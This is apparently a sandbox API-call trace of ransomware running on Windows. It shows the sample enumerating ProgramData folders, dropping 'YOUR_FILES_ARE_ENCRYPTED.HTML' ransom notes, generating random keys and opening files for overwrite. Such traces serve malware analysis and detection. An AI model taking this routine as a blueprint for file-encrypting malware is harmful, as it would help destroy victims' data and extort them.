[0106.427] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network" [0106.427] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*" [0106.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0106.427] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.427] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0106.427] StrStrIW (lpFirst="Connections", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.427] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections") returned 48 [0106.427] GetProcessHeap () returned 0x600000 [0106.427] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.429] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections" [0106.429] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*" [0106.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628f60, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.429] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628f60, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.429] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628f60, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 0 [0106.429] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.429] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0106.429] GetProcessHeap () returned 0x600000 [0106.429] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.430] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\network\\connections\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.430] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.432] CloseHandle (hObject=0x314) returned 1 [0106.432] GetProcessHeap () returned 0x600000 [0106.432] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.432] GetProcessHeap () returned 0x600000 [0106.432] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.433] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe06db82a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0106.433] StrStrIW (lpFirst="Downloader", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.434] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader") returned 47 [0106.434] GetProcessHeap () returned 0x600000 [0106.434] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.435] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader" [0106.435] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*" [0106.435] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe06db82a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628f60, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.435] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe06db82a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628f60, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.435] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06db82a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x637d2204, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x628f60, dwReserved1=0x19ebd8, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1 [0106.435] StrStrIW (lpFirst="qmgr0.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.435] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0106.435] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0106.435] lstrlenW (lpString=".dat") returned 4 [0106.435] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0106.435] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.436] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.436] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06db82a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x637d837e, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x628f60, dwReserved1=0x19ebd8, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1 [0106.436] StrStrIW (lpFirst="qmgr1.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.436] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57 [0106.436] PathFindExtensionW (pszPath="qmgr1.dat") returned=".dat" [0106.436] lstrlenW (lpString=".dat") returned 4 [0106.436] PathFindExtensionW (pszPath="qmgr1.dat") returned=".dat" [0106.436] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.436] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.436] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06db82a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x637d837e, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x628f60, dwReserved1=0x19ebd8, cFileName="qmgr1.dat", cAlternateFileName="")) returned 0 [0106.437] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.437] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0106.437] GetProcessHeap () returned 0x600000 [0106.437] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.437] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.438] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.439] CloseHandle (hObject=0x314) returned 1 [0106.440] GetProcessHeap () returned 0x600000 [0106.440] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.440] GetProcessHeap () returned 0x600000 [0106.440] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.441] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe06db82a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 0 [0106.441] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0106.441] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0106.441] GetProcessHeap () returned 0x600000 [0106.441] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.442] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\network\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.442] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.443] CloseHandle (hObject=0x308) returned 1 [0106.444] GetProcessHeap () returned 0x600000 [0106.444] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.444] GetProcessHeap () returned 0x600000 [0106.444] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.446] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Office", cAlternateFileName="")) returned 1 [0106.446] StrStrIW (lpFirst="Office", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.446] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office") returned 35 [0106.446] GetProcessHeap () returned 0x600000 [0106.446] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0106.447] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Office" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Office") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Office" [0106.447] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Office", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\*" [0106.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626878 [0106.448] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.448] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 1 [0106.448] StrStrIW (lpFirst="ClickToRunPackageLocker", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.448] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\ClickToRunPackageLocker") returned 59 [0106.448] PathFindExtensionW (pszPath="ClickToRunPackageLocker") returned="" [0106.448] lstrlenW (lpString="") returned 0 [0106.448] PathFindExtensionW (pszPath="ClickToRunPackageLocker") returned="" [0106.448] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 0 [0106.448] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0106.448] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0106.448] GetProcessHeap () returned 0x600000 [0106.448] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.449] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\office\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.449] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.452] CloseHandle (hObject=0x308) returned 1 [0106.452] GetProcessHeap () returned 0x600000 [0106.452] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.452] GetProcessHeap () returned 0x600000 [0106.452] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.456] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Provisioning", cAlternateFileName="PROVIS~1")) returned 1 [0106.457] StrStrIW (lpFirst="Provisioning", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.457] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning") returned 41 [0106.457] GetProcessHeap () returned 0x600000 [0106.457] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0106.468] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning" [0106.468] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\*" [0106.468] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0106.576] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.576] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11be8600, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11be8600, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11be8600, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6815, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="countrytable.xml", cAlternateFileName="")) returned 1 [0106.576] StrStrIW (lpFirst="countrytable.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.576] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml") returned 58 [0106.576] PathFindExtensionW (pszPath="countrytable.xml") returned=".xml" [0106.576] lstrlenW (lpString=".xml") returned 4 [0106.576] PathFindExtensionW (pszPath="countrytable.xml") returned=".xml" [0106.577] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0106.577] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\countrytable.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.578] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", cAlternateFileName="{18DCF~1")) returned 1 [0106.578] StrStrIW (lpFirst="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.579] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, 